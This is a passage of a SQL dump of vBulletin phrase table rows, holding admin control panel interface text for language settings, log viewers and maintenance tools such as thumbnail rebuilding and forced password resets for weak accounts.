lose any translated versions of the phrase in other language sets.', 'vbulletin', '', 0, ''), (36287, -1, 'if_you_would_like_to_remove_this_phrase', 'language', 'If You Would Like to Remove this Phrase', 'vbulletin', '', 0, ''), (36288, -1, 'ignore_language_version', 'language', 'Ignore Language Version Use language file even if it was created by a different version of vBulletin?', 'vbulletin', '', 0, ''), (36289, -1, 'image_folder_override', 'language', 'Button Images Folder Override\r\nUse this to override the button images folder associated with the style being used. By default, this folder is images/buttons.\r\nYou may use <#> to represent the style ID the user is currently using.', 'vbulletin', 'vBulletin Solutions', 1216114920, '3.8.0 Alpha 1'), (36290, -1, 'import_language_xml_file', 'language', 'Import Language XML File', 'vbulletin', '', 0, ''), (36291, -1, 'importing_language', 'language', 'Importing Language', 'vbulletin', '', 0, ''), (36292, -1, 'include_custom_phrases', 'language', 'Include Custom Phrases', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36293, -1, 'insert_into_master_language_developer_option', 'language', 'Insert into MASTER LANGUAGE (Developer Option)', 'vbulletin', '', 0, ''), (36294, -1, 'is_default_language', 'language', 'Is Default Language', 'vbulletin', '', 0, ''), (36295, -1, 'just_fetch_phrases', 'language', 'Just fetch phrases\r\n(No language settings will be included if \'Yes\' is selected)', 'vbulletin', '', 0, ''), (36296, -1, 'keep', 'language', 'Keep', 'vbulletin', '', 0, ''), (36297, -1, 'keep_all', 'language', 'Keep All', 'vbulletin', '', 0, ''), (36298, -1, 'keep_orphans_notes', 'language', 'Shown here are all the translations for the orphan phrases you want to keep. You must choose one translation of each phrase to become the default version of that phrase.', 'vbulletin', '', 0, ''), (36299, -1, 'language_code', 'language', 'Language Code This is the abbreviation your language uses, such as "en" or "en-US". See here for more information.', 'vbulletin', 'vBulletin Solutions', 1160697927, '3.6.3'), (36300, -1, 'language_manager', 'language', 'Language Manager', 'vbulletin', '', 0, ''), (36301, -1, 'left', 'language', 'Left', 'vbulletin', '', 0, ''), (36302, -1, 'left_to_right', 'language', 'Left to Right', 'vbulletin', '', 0, ''), (36303, -1, 'locale', 'language', 'LocaleYou can define a locale so that dates are properly translated. The setting for your locale will depend on your server OS and not all locales are supported on all systems. Windows servers need to look here and everyone else needs to look here and here. You must fill in all of the override fields below and use the formatting found here.

Examples for windows are \'Chinese\' and \'deu\'.
Examples for Linux are \'de_DE\' and \'fr_FR\'.
', 'vbulletin', 'vBulletin Solutions', 1209721537, '3.7.1'), (36304, -1, 'logdate_format_override', 'language', 'Log Date Format OverrideUse this to override the default Admin CP Log format', 'vbulletin', '', 0, ''), (36305, -1, 'master_language', 'language', 'MASTER LANGUAGE', 'vbulletin', '', 0, ''), (36306, -1, 'no_x_phrases_defined', 'language', 'There are no {1} phrases defined', 'vbulletin', '', 0, ''), (36307, -1, 'number_formatting', 'language', 'Number Formatting', 'vbulletin', '', 0, ''), (36308, -1, 'overwrite_language_dfn', 'language', 'Overwrite Language (Selecting a language here will cause the imported language to overwrite an existing language. Leave blank to create a new language.)', 'vbulletin', '', 0, ''), (36309, -1, 'overwriting_language_x', 'language', 'Overwriting Language \'{1}\'', 'vbulletin', '', 0, ''), (36310, -1, 'phrase_manager', 'language', 'Phrase Manager', 'vbulletin', '', 0, ''), (36311, -1, 'phrase_name_only', 'language', 'Phrase Variable Name Only', 'vbulletin', '', 0, ''), (36312, -1, 'phrase_text_and_phrase_name', 'language', 'Phrase Text and Phrase Variable Name', 'vbulletin', '', 0, ''), (36313, -1, 'phrase_text_only', 'language', 'Phrase Text Only', 'vbulletin', '', 0, ''), (36314, -1, 'phrase_translation_desc_1', 'language', 'When inserting a custom phrase, you may also specify the translations into whatever languages you have installed.', 'vbulletin', '', 0, ''), (36315, -1, 'phrase_translation_desc_2', 'language', 'If you do leave a translation box blank, it will inherit the text from the \'Text to insert\' box', 'vbulletin', '', 0, ''), (36316, -1, 'phrase_translation_desc_3', 'language', 'You may customize the translations further at any time.', 'vbulletin', '', 0, ''), (36317, -1, 'phrases_to_show_per_page', 'language', 'Phrases to Show Per Page', 'vbulletin', '', 0, ''), (36318, -1, 'quickref', 'language', 'QuickRef', 'vbulletin', '', 0, ''), (36319, -1, 'rebuild_all_languages', 'language', 'Rebuild All Languages', 'vbulletin', '', 0, ''), (36320, -1, 'rebuild_language_information', 'language', 'Rebuild Language Information', 'vbulletin', '', 0, ''), (36321, -1, 'rebuilding_language_x', 'language', 'Rebuilding Language {1}', 'vbulletin', '', 0, ''), (36322, -1, 'registereddate_format_override', 'language', 'Registration Date Format Override Use this to override the default registration date format', 'vbulletin', '', 0, ''), (36323, -1, 'right', 'language', 'Right', 'vbulletin', '', 0, ''), (36324, -1, 'right_to_left', 'language', 'Right to Left', 'vbulletin', '', 0, ''), (36325, -1, 'search_in_language', 'language', 'Search in Language', 'vbulletin', '', 0, ''), (36326, -1, 'search_in_phrases', 'language', 'Search in Phrases', 'vbulletin', '', 0, ''), (36327, -1, 'search_phrases', 'language', 'Search Phrases', 'vbulletin', '', 0, ''), (36328, -1, 'search_translated_phrases_only', 'language', 'Search Translated Phrases Only\r\nWhen selecting a specific language, select \'Yes\' here to search translated phrases only, excluding untranslated items.', 'vbulletin', 'vBulletin Solutions', 1151345323, '3.6.0 Beta 4'), (36329, -1, 'standard_phrase', 'language', 'Standard Phrase', 'vbulletin', '', 0, ''), (36330, -1, 'text_direction', 'language', 'Text Direction', 'vbulletin', '', 0, ''), (36331, -1, 'thousands_separator', 'language', 'Thousands Separator (The character used to separate thousands in formatted numbers, such as the , used in 1,024. To specify a space, please use the underscore _)', 'vbulletin', '', 0, ''), (36332, -1, 'time_format_override', 'language', 'Time Format Override\r\nSee: http://www.php.net/manual-lookup.php?function=strftime

\r\nExamples: (if a locale is specified)
\r\nAM/PM Time Format (eg, 11:15 PM): %I:%M %p
\r\n24-Hour Format Time (eg, 23:15): %H:%M
\r\nDefault Time Format for this Locale: %X\r\n
', 'vbulletin', 'vBulletin Solutions', 1192528667, '3.7.0 Beta 1'), (36333, -1, 'title_for_uploaded_language', 'language', 'Title for Uploaded Language (Leave blank to use the language title specified in the language file)', 'vbulletin', '', 0, ''), (36334, -1, 'updated_default_phrases_desc', 'language', 'The phrases shown on this page have been updated in the default language since you customized them.
\r\n
\r\nIt may be necessary for you to revert the custom phrases or otherwise check that they fully support vBulletin {1}. If you do not do this, some sections of vBulletin may not function!', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36335, -1, 'view_language', 'language', 'View Language', 'vbulletin', '', 0, ''), (36336, -1, 'view_quickref', 'language', 'View QuickRef', 'vbulletin', '', 0, ''), (36337, -1, 'view_summary', 'language', 'View Summary', 'vbulletin', '', 0, ''), (36338, -1, 'x_phrases', 'language', '{1} Phrases', 'vbulletin', '', 0, ''), (36339, -1, 'x_phrases_containing_y', 'language', '{1} Phrases Containing \'{2}\'', 'vbulletin', '', 0, ''), (36340, -1, 'admin_control_panel_failed_logins', 'logging', 'Admin Control Panel Failed Logins', 'vbulletin', '', 0, ''), (36341, -1, 'album_x_by_y_deleted', 'logging', 'Album \'{1}\' by {2} Deleted', 'vbulletin', 'vBulletin Solutions', 1207226905, '3.7.0 Release Candidate 3'), (36342, -1, 'album_x_by_y_edited', 'logging', 'Album \'{1}\' by {2} Edited', 'vbulletin', 'vBulletin Solutions', 1207152854, '3.7.0 Release Candidate 3'), (36343, -1, 'all_log_entries', 'logging', 'All Log Entries', 'vbulletin', '', 0, ''), (36344, -1, 'all_scheduled_tasks', 'logging', 'All Scheduled Tasks', 'vbulletin', '', 0, ''), (36345, -1, 'all_scripts', 'logging', 'All Scripts', 'vbulletin', '', 0, ''), (36346, -1, 'are_you_sure_you_want_to_prune_x_log_entries_from_control_panel_log', 'logging', 'Are you sure you want to prune {1} log entries from the control panel log?', 'vbulletin', '', 0, ''), (36347, -1, 'are_you_sure_you_want_to_prune_x_log_entries_from_moderator_log', 'logging', 'Are you sure you want to prune {1} log entries from the moderator log?', 'vbulletin', '', 0, ''), (36348, -1, 'are_you_sure_you_want_to_prune_x_log_entries_from_scheduled_task_log', 'logging', 'Are you sure you want to prune {1} log entries from the scheduled task log?', 'vbulletin', '', 0, ''), (36349, -1, 'control_panel_log_pruning_permission_restricted', 'logging', 'Control Panel log pruning permission restricted.', 'vbulletin', '', 0, ''), (36350, -1, 'control_panel_log_viewer', 'logging', 'Control Panel Log Viewer', 'vbulletin', '', 0, ''), (36351, -1, 'control_panel_log_viewer_page_x_y_there_are_z_total_log_entries', 'logging', 'Control Panel Log Viewer (page {1}/{2}) | There are {3} total log entries.', 'vbulletin', '', 0, ''), (36352, -1, 'control_panel_log_viewing_restricted', 'logging', 'Control Panel log viewing restricted.', 'vbulletin', '', 0, ''), (36353, -1, 'discussion_by_x_for_y_approved', 'logging', 'Discussion by {1} for {2} Approved', 'vbulletin', 'vBulletin Solutions', 1212163565, '3.7.1'), (36354, -1, 'discussion_by_x_for_y_removed', 'logging', 'Group Discussion by {1} for {2} Removed', 'vbulletin', 'vBulletin Solutions', 1212066366, '3.7.1'), (36355, -1, 'discussion_by_x_for_y_soft_deleted', 'logging', 'Group Discussion by {1} for {2} Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1212066409, '3.7.1'), (36356, -1, 'discussion_by_x_for_y_unapproved', 'logging', 'Discussion by {1} for {2} unapproved', 'vbulletin', 'vBulletin Solutions', 1224675152, '3.8.0 Beta 2'), (36357, -1, 'gm_by_x_in_y_for_z_approved', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Approved', 'vbulletin', 'vBulletin Solutions', 1210949565, '3.7.1'), (36358, -1, 'gm_by_x_in_y_for_z_edited', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Edited', 'vbulletin', 'vBulletin Solutions', 1210949241, '3.7.1'), (36359, -1, 'gm_by_x_in_y_for_z_removed', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Removed', 'vbulletin', 'vBulletin Solutions', 1210949353, '3.7.1'), (36360, -1, 'gm_by_x_in_y_for_z_soft_deleted', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1210949386, '3.7.1'), (36361, -1, 'gm_by_x_in_y_for_z_unapproved', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Unapproved', 'vbulletin', 'vBulletin Solutions', 1211887897, '3.7.1'), (36362, -1, 'gm_by_x_in_y_for_z_undeleted', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Undeleted', 'vbulletin', 'vBulletin Solutions', 1210949456, '3.7.1'), (36363, -1, 'id', 'logging', 'ID', 'vbulletin', '', 0, ''), (36364, -1, 'log_entries', 'logging', 'Log Entries', 'vbulletin', '', 0, ''), (36365, -1, 'log_entries_to_show_per_page', 'logging', 'Log Entries to Show Per Page', 'vbulletin', '', 0, ''), (36366, -1, 'log_file_deletion_restricted', 'logging', 'Log file deletion restricted.', 'vbulletin', '', 0, ''), (36367, -1, 'moderator_log_viewer', 'logging', 'Moderator Log Viewer', 'vbulletin', '', 0, ''), (36368, -1, 'moderator_log_viewer_page_x_y_there_are_z_total_log_entries', 'logging', 'Moderator Log Viewer (page {1}/{2}) | There are {3} total log entries.', 'vbulletin', '', 0, ''), (36369, -1, 'order_by_action', 'logging', 'Order By Action', 'vbulletin', '', 0, ''), (36370, -1, 'order_by_script', 'logging', 'Order By Script', 'vbulletin', '', 0, ''), (36371, -1, 'pc_by_x_on_y_approved', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Approved', 'vbulletin', 'vBulletin Solutions', 1207235059, '3.7.0 Release Candidate 3'), (36372, -1, 'pc_by_x_on_y_edited', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Edited', 'vbulletin', 'vBulletin Solutions', 1207234477, '3.7.0 Release Candidate 3'), (36373, -1, 'pc_by_x_on_y_removed', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Removed', 'vbulletin', 'vBulletin Solutions', 1207234497, '3.7.0 Release Candidate 3'), (36374, -1, 'pc_by_x_on_y_soft_deleted', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1207234488, '3.7.0 Release Candidate 3'), (36375, -1, 'pc_by_x_on_y_unapproved', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Unapproved', 'vbulletin', 'vBulletin Solutions', 1207235067, '3.7.0 Release Candidate 3'), (36376, -1, 'pc_by_x_on_y_undeleted', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Undeleted', 'vbulletin', 'vBulletin Solutions', 1207235095, '3.7.0 Release Candidate 3'), (36377, -1, 'picture_x_in_y_by_z_approved', 'logging', 'Picture \'{1}\' in Album \'{2}\' by {3} Approved', 'vbulletin', 'vBulletin Solutions', 1207236122, '3.7.0 Release Candidate 3'), (36378, -1, 'picture_x_in_y_by_z_deleted', 'logging', 'Picture \'{1}\' in Album \'{2}\' by {3} Deleted', 'vbulletin', 'vBulletin Solutions', 1207227682, '3.7.0 Release Candidate 3'), (36379, -1, 'picture_x_in_y_by_z_edited', 'logging', 'Picture \'{1}\' in Album \'{2}\' by {3} Edited', 'vbulletin', 'vBulletin Solutions', 1207227674, '3.7.0 Release Candidate 3'), (36380, -1, 'prune_control_panel_log', 'logging', 'Prune Control Panel Log', 'vbulletin', '', 0, ''), (36381, -1, 'prune_log_entries', 'logging', 'Prune Log Entries', 'vbulletin', '', 0, ''), (36382, -1, 'prune_moderator_log', 'logging', 'Prune Moderator Log', 'vbulletin', '', 0, ''), (36383, -1, 'prune_scheduled_task_log', 'logging', 'Prune Scheduled Task Log', 'vbulletin', '', 0, ''), (36384, -1, 'remove_entries_logged_by_user', 'logging', 'Remove Entries Logged by User', 'vbulletin', '', 0, ''), (36385, -1, 'remove_entries_older_than_days', 'logging', 'Remove Entries Older Than (Days)', 'vbulletin', '', 0, ''), (36386, -1, 'remove_entries_related_to_action', 'logging', 'Remove Entries Relating to Action', 'vbulletin', '', 0, ''), (36387, -1, 'remove_entries_relating_to_script', 'logging', 'Remove Entries Relating to Script', 'vbulletin', '', 0, ''), (36388, -1, 'scheduled_task_log_viewer', 'logging', 'Scheduled Task Log Viewer', 'vbulletin', '', 0, ''), (36389, -1, 'scheduled_task_log_viewer_page_x_y_there_are_z_total_log_entries', 'logging', 'Scheduled Task Log Viewer (page {1}/{2}) | There are {3} total log entries.', 'vbulletin', '', 0, ''), (36390, -1, 'show_only_entries_generated_by', 'logging', 'Show Only Entries Generated By', 'vbulletin', '', 0, ''), (36391, -1, 'show_only_entries_relating_to_script', 'logging', 'Show Only Entries Relating to Script', 'vbulletin', '', 0, ''), (36392, -1, 'social_group_picture_x_in_y_removed', 'logging', 'Social Group Picture \'{1}\' in \'{2}\' Removed', 'vbulletin', 'vBulletin Solutions', 1207231009, '3.7.0 Release Candidate 3'), (36393, -1, 'social_group_x_deleted', 'logging', 'Social Group \'{1}\' Deleted', 'vbulletin', 'vBulletin Solutions', 1207230211, '3.7.0 Release Candidate 3'), (36394, -1, 'social_group_x_edited', 'logging', 'Social Group \'{1}\' Edited', 'vbulletin', 'vBulletin Solutions', 1207230203, '3.7.0 Release Candidate 3'), (36395, -1, 'social_group_x_members_managed', 'logging', 'Social Group \'{1}\' Members Managed', 'vbulletin', 'vBulletin Solutions', 1207230533, '3.7.0 Release Candidate 3'), (36396, -1, 'untitled', 'logging', 'Untitled', 'vbulletin', 'vBulletin Solutions', 1237982466, '3.8.2'), (36397, -1, 'vbulletin_database_errors', 'logging', 'vBulletin Database Errors', 'vbulletin', '', 0, ''), (36398, -1, 'view_logs', 'logging', 'View Logs', 'vbulletin', '', 0, ''), (36399, -1, 'vm_by_x_for_y_approved', 'logging', 'Visitor Message by {1} for {2} Approved', 'vbulletin', 'vBulletin Solutions', 1207308347, '3.7.0 Release Candidate 3'), (36400, -1, 'vm_by_x_for_y_edited', 'logging', 'Visitor Message by {1} for {2} Edited', 'vbulletin', 'vBulletin Solutions', 1207308276, '3.7.0 Release Candidate 3'), (36401, -1, 'vm_by_x_for_y_removed', 'logging', 'Visitor Message by {1} for {2} Removed', 'vbulletin', 'vBulletin Solutions', 1207308311, '3.7.0 Release Candidate 3'), (36402, -1, 'vm_by_x_for_y_soft_deleted', 'logging', 'Visitor Message by {1} for {2} Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1207308303, '3.7.0 Release Candidate 3'), (36403, -1, 'vm_by_x_for_y_unapproved', 'logging', 'Visitor Message by {1} for {2} Unapproved', 'vbulletin', 'vBulletin Solutions', 1207308341, '3.7.0 Release Candidate 3'), (36404, -1, 'vm_by_x_for_y_undeleted', 'logging', 'Visitor Message by {1} for {2} Undeleted', 'vbulletin', 'vBulletin Solutions', 1207308326, '3.7.0 Release Candidate 3'), (36405, -1, 'want_to_access_grant_access_to_this_script', 'logging', 'Want to restrict/grant access to this script?', 'vbulletin', '', 0, ''), (36406, -1, 'affected_accounts_that_were_last_active_x_y', 'maintenance', 'Affected accounts that were last active {1}: {2}', 'vbulletin', 'vBulletin Solutions', 1219329684, '3.8.0 Alpha 1'), (36407, -1, 'affected_accounts_x', 'maintenance', 'Affected Accounts: {1}', 'vbulletin', 'vBulletin Solutions', 1219329869, '3.8.0 Alpha 1'), (36408, -1, 'anon_server_survey', 'maintenance', 'Anonymous Server Survey', 'vbulletin', 'vBulletin Solutions', 1158153954, '3.6.1'), (36409, -1, 'anon_server_survey_desc', 'maintenance', '

In order to provide products that are well-suited to the servers and sites that currently run vBulletin,\r\n we are running a survey to find out what kind of capabilities our customers\' servers have, and what scale\r\n of bulletin boards they run.

\r\n

By submitting this survey to vBulletin.com you will help us to ensure that our forthcoming releases\r\n are both compatible with and make full use of the services available on your servers.

\r\n

There is some data at the bottom of the form that is optional for you to submit. This information\r\n describes your own board, and lets us know how busy etc. your site is.

\r\n

The information submitted in this survey is entirely anonymous and no information that can identify\r\n the site that posted the survey data will be collected.

', 'vbulletin', 'vBulletin Solutions', 1159793730, '3.6.2'), (36410, -1, 'apache_modules', 'maintenance', 'Apache Modules', 'vbulletin', 'vBulletin Solutions', 1158154007, '3.6.1'), (36411, -1, 'are_you_sure_empty_index', 'maintenance', 'Are you sure you wish to empty the search index?', 'vbulletin', '', 0, ''), (36412, -1, 'building_attachment_thumbnails', 'maintenance', 'Building Attachment ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last attachment listed on the screen then refresh this window.', 'vbulletin', '', 0, ''), (36413, -1, 'building_avatar_thumbnails', 'maintenance', 'Building Avatar ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last avatar thumbnail listed on the screen then refresh this window.', 'vbulletin', 'vBulletin Solutions', 1231770906, '3.8.1'), (36414, -1, 'building_post_cache', 'maintenance', 'Building Post Cache', 'vbulletin', '', 0, ''), (36415, -1, 'building_search_index', 'maintenance', 'Building Search Index', 'vbulletin', '', 0, ''), (36416, -1, 'building_sgicon_thumbnails', 'maintenance', 'Building Social Group Icon ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last thumbnail listed on the screen then refresh this window.', 'vbulletin', 'vBulletin Solutions', 1231772120, '3.8.1'), (36417, -1, 'change_output_signatures_empty_cache', 'maintenance', 'If you have made changes that affect the output of signatures, you may use this to empty the cache and force signatures to be rebuilt with the new settings.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36418, -1, 'character_sets_usage', 'maintenance', 'Character Sets in Use', 'vbulletin', 'vBulletin Solutions', 1158154052, '3.6.1'), (36419, -1, 'check_accounts_with_last_activity', 'maintenance', 'Check Accounts with Last Activity', 'vbulletin', 'vBulletin Solutions', 1219241260, '3.8.0 Alpha 1'), (36420, -1, 'check_affected_accounts', 'maintenance', 'Check Affected Accounts', 'vbulletin', 'vBulletin Solutions', 1219230366, '3.8.0 Alpha 1'), (36421, -1, 'check_styles_no_parent', 'maintenance', 'Check For Styles With No Parent', 'vbulletin', '', 0, ''), (36422, -1, 'confirm_prefix_change_x_to_y', 'maintenance', 'Confirm Table Prefix Change (From \'{1}\' to \'{2}\')\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36423, -1, 'delete_duplicate_threads', 'maintenance', 'Delete Duplicate Threads', 'vbulletin', '', 0, ''), (36424, -1, 'delete_x', 'maintenance', 'Delete {1}', 'vbulletin', '', 0, ''), (36425, -1, 'deleted_orphan_threads_successfully', 'maintenance', 'Deleted Orphan Threads Successfully', 'vbulletin', '', 0, ''), (36426, -1, 'email_from', 'maintenance', 'Email From', 'vbulletin', 'vBulletin Solutions', 1220137492, '3.8.0 Alpha 1'), (36427, -1, 'email_permanently_banned_users', 'maintenance', 'Email Permanently Banned Users\r\nIf you select no, permanently banned users\' passwords will be reset, but they will not receive an email. Temporarily banned users will always be emailed.', 'vbulletin', 'vBulletin Solutions', 1220350760, '3.8.0 Alpha 1'), (36428, -1, 'email_subject', 'maintenance', 'Email Subject', 'vbulletin', 'vBulletin Solutions', 1219247828, '3.8.0 Alpha 1'), (36429, -1, 'email_to_send_at_once', 'maintenance', 'Email to Send At Once', 'vbulletin', 'vBulletin Solutions', 1219328796, '3.8.0 Alpha 1'), (36430, -1, 'empty_signature_cache', 'maintenance', 'Empty Signature Cache', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36431, -1, 'error_attachment_missing', 'maintenance', 'Error: Attachment Missing', 'vbulletin', '', 0, ''), (36432, -1, 'error_thumbnail_failed_x', 'maintenance', 'Error: Library Error: {1}', 'vbulletin', '', 0, ''), (36433, -1, 'error_thumbnail_nocreateimage', 'maintenance', 'Error: Invalid image file or GD version is set wrong', 'vbulletin', '', 0, ''), (36434, -1, 'error_thumbnail_nogetimagesize', 'maintenance', 'Error: Could not determine image size', 'vbulletin', '', 0, ''), (36435, -1, 'error_thumbnail_nogif', 'maintenance', 'Error: PHP lacks GIF support', 'vbulletin', '', 0, ''), (36436, -1, 'error_thumbnail_nojpg', 'maintenance', 'Error: PHP lacks JPG support', 'vbulletin', '', 0, ''), (36437, -1, 'error_thumbnail_nopng', 'maintenance', 'Error: PHP lacks PNG support', 'vbulletin', '', 0, ''), (36438, -1, 'error_thumbnail_nosupport', 'maintenance', 'No support for this type in the chosen image library', 'vbulletin', '', 0, ''), (36439, -1, 'error_thumbnail_notcorrectimage', 'maintenance', 'Incorrect extension for this file', 'vbulletin', '', 0, ''), (36440, -1, 'error_thumbnail_notenoughmemory', 'maintenance', 'Error: Not Enough Memory', 'vbulletin', '', 0, ''), (36441, -1, 'error_thumbnailalready', 'maintenance', 'Image is already <= thumbnail size', 'vbulletin', '', 0, ''), (36442, -1, 'finds_users_without_complete_entries', 'maintenance', 'Finds any users who do not have complete entries in the database. Sometimes the data is not inserted correctly and the user\'s profile becomes unusable. Running this should correct any incomplete profiles.', 'vbulletin', '', 0, ''), (36443, -1, 'first_post_date', 'maintenance', 'First Post Date', 'vbulletin', 'vBulletin Solutions', 1158154118, '3.6.1'), (36444, -1, 'fix_broken_user_profiles', 'maintenance', 'Fix broken user profiles', 'vbulletin', '', 0, ''), (36445, -1, 'function_allows_rebuild_all_style_info', 'maintenance', 'This function allows you to completely rebuild all style information. This is necessary after a major upgrade, or if you have manually edited any of the \'special\' templates.', 'vbulletin', '', 0, ''), (36446, -1, 'function_rebuilds_reputation', 'maintenance', 'This function recalculates user reputation using the value that you specify below then adds the total reputation the user has received so far. This will remove any custom reputation that has been given to the user through the user editor.', 'vbulletin', '', 0, ''), (36447, -1, 'function_rebuilds_thumbnails', 'maintenance', 'This function rebuilds the attachment thumbnails. It is needed when you enable thumbnails, change the thumbnail dimensions, or change the thumbnail JPG quality.', 'vbulletin', '', 0, ''), (36448, -1, 'function_removes_orphan_posts', 'maintenance', 'This function removes all posts that belong to threads that no longer exist.', 'vbulletin', '', 0, ''), (36449, -1, 'function_removes_orphan_threads', 'maintenance', 'This function removes all threads that belong to forums that no longer exist.', 'vbulletin', '', 0, ''), (36450, -1, 'include_automatic_javascript_redirect', 'maintenance', 'Include automatic JavaScript redirect to next page?', 'vbulletin', '', 0, ''), (36451, -1, 'last_upgrade_date', 'maintenance', 'Last Upgrade Date', 'vbulletin', 'vBulletin Solutions', 1158154129, '3.6.1'), (36452, -1, 'list_of_tables_in_db_below', 'maintenance', '

Below is a list of all the tables in your database.\r\nYou should make sure that you select only tables that are part of vBulletin.

\r\n

If you are not sure, do not continue with this operation.

\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36453, -1, 'max_height', 'maintenance', 'Maximum Height', 'vbulletin', 'vBulletin Solutions', 1193951685, '3.7.0 Beta 1'), (36454, -1, 'max_width', 'maintenance', 'Maximum Width', 'vbulletin', 'vBulletin Solutions', 1193951675, '3.7.0 Beta 1'), (36455, -1, 'new_prefix_same_as_old', 'maintenance', 'You have not chosen a new table prefix, this script cannot continue.

\r\n(Old table prefix: \'{1}\', new table prefix: \'{2}\')', 'vbulletin', '', 0, ''), (36456, -1, 'new_table_name', 'maintenance', 'New Table Name\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36457, -1, 'new_table_prefix', 'maintenance', 'New Table Prefix\r\n', 'vbulletin', '', 0, ''), (36458, -1, 'note_duplicate_threads_have_same', 'maintenance', 'Note: Duplicate threads are threads that have the same title, post name, and post time and are posting in the same forum as another thread.', 'vbulletin', '', 0, ''), (36459, -1, 'note_rebuild_similar_thread_list', 'maintenance', 'Note: This will rebuild the similar thread list regardless of whether they are enabled or not. However, they will not be displayed until the option is enabled.', 'vbulletin', '', 0, ''), (36460, -1, 'note_reindexing_empty_indexes_x', 'maintenance', 'Note: If you are re-indexing, you may want to empty the indexes. Click Here to do so!', 'vbulletin', 'vBulletin Solutions', 1205941509, '3.7.0 Release Candidate 1'), (36461, -1, 'note_server_intensive', 'maintenance', 'Note: This is a server intensive process.', 'vbulletin', '', 0, ''), (36462, -1, 'number_of_attachments_to_process_per_cycle', 'maintenance', 'Number of attachments to process per cycle', 'vbulletin', '', 0, ''), (36463, -1, 'number_of_avatars_to_process_per_cycle', 'maintenance', 'Number of avatars to process per cycle', 'vbulletin', 'vBulletin Solutions', 1193951739, '3.7.0 Beta 1'), (36464, -1, 'number_of_forums_to_process_per_cycle', 'maintenance', 'Number of forums to process per cycle', 'vbulletin', '', 0, ''), (36465, -1, 'number_of_icons_to_process_per_cycle', 'maintenance', 'Number of icons to process per cycle', 'vbulletin', 'vBulletin Solutions', 1231771437, '3.8.1'), (36466, -1, 'number_of_posts_to_process_per_cycle', 'maintenance', 'Number of posts to process per cycle', 'vbulletin', '', 0, ''), (36467, -1, 'number_of_threads_to_process_per_cycle', 'maintenance', 'Number of threads to process per cycle', 'vbulletin', '', 0, ''), (36468, -1, 'number_of_users_to_process_per_cycle', 'maintenance', 'Number of users to process per cycle', 'vbulletin', '', 0, ''), (36469, -1, 'old_table_prefix', 'maintenance', 'Old Table Prefix\r\n', 'vbulletin', '', 0, ''), (36470, -1, 'only_accounts_using_language_x_were_processed', 'maintenance', 'Only accounts configured to use the language \'{1}\' were processed and notified.', 'vbulletin', 'vBulletin Solutions', 1222095679, '3.8.0 Alpha 2'), (36471, -1, 'optional_info', 'maintenance', 'Optional Information', 'vbulletin', 'vBulletin Solutions', 1158153966, '3.6.1'), (36472, -1, 'original_table_name', 'maintenance', 'Original Table Name\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36473, -1, 'other_prefix_warning', 'maintenance', 'WARNING!
The following tables do not have the\r\noriginal table prefix! These tables may not be part of vBulletin.\r\n
    {1}
\r\nAre you absolutely sure you want to continue?\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36474, -1, 'over_1_month_ago', 'maintenance', 'Over 1 month ago', 'vbulletin', 'vBulletin Solutions', 1219231861, '3.8.0 Alpha 1'), (36475, -1, 'over_1_week_ago', 'maintenance', 'Over 1 week ago', 'vbulletin', 'vBulletin Solutions', 1219231818, '3.8.0 Alpha 1'), (36476, -1, 'over_any_period', 'maintenance', 'Over any period', 'vbulletin', 'vBulletin Solutions', 1219236015, '3.8.0 Alpha 1'), (36477, -1, 'over_x_days_ago', 'maintenance', 'Over {1} days ago', 'vbulletin', 'vBulletin Solutions', 1219231781, '3.8.0 Alpha 1'), (36478, -1, 'over_x_months_ago', 'maintenance', 'Over {1} months ago', 'vbulletin', 'vBulletin Solutions', 1219231882, '3.8.0 Alpha 1'), (36479, -1, 'over_x_weeks_ago', 'maintenance', 'Over {1} weeks ago', 'vbulletin', 'vBulletin Solutions', 1219231841, '3.8.0 Alpha 1'), (36480, -1, 'password_check_notice', 'maintenance', 'Some users may have created accounts with vulnerable passwords. Vulnerable passwords can be passwords that are:
\r\n
  • The same as the account username
\r\nSuch passwords make accounts vulnerable to exploitation from automated scripts and programs that can guess the password to access your board under the guise of the \r\naffected users. This may be done for the purposes of spam or online identity theft.

\r\nUsers can no longer create accounts with the above vulnerabilities, but older accounts may still be affected. Affected users will be prompted to change their current password the next time they login. However, older accounts may still be vulnerable where the user no longer uses the account to access your board. Note that if you force a reset of an account and the email address associated with the account is no longer valid, the user may effectively be locked out of that account.

\r\nFor this reason you may choose which accounts to reset based on the users\' last activity. Users who have recently logged in are more likely to change their password and email settings themselves. \r\nIt is advised that accounts that have not been accessed recently are reset first. You can check at a later time or date how many affected accounts remain before deciding to force a password reset.

\r\nWhen you perform a reset, an email will be sent to the affected users. You will have an option to change the email message.

